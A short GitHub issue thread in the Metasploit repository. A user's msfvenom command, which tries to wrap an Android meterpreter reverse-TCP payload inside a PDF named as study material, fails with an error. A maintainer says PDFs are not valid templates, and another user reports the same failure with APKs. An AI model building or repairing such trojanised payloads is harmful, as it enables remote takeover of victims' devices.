### ISSUE TITLE
Why it showing like this

### ISSUE THREAD

**Issue by farseen79** [rapid7/metasploit-framework#15151]
root@panzer101:/home/kali/Downloads# sudo msfvenom -x web_application_terminologies.pdf -p android/meterpreter/reverse_tcp LHOST=192.168.0.161 LPORT=4444 -o hack.pdf
Using APK template: web_application_terminologies.pdf
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: undefined method `[]' for nil:NilClass

**Comment by bcoles** [comment]
Probably because you're trying to use a PDF file as a template with `-x`. PDF files are not a valid template.

**Comment by omarmerheb** [comment]
i have the same problem even when i am using an apk file not pdf and i tried multiple apks none works  and i don't know how to rebuild the file with apktool
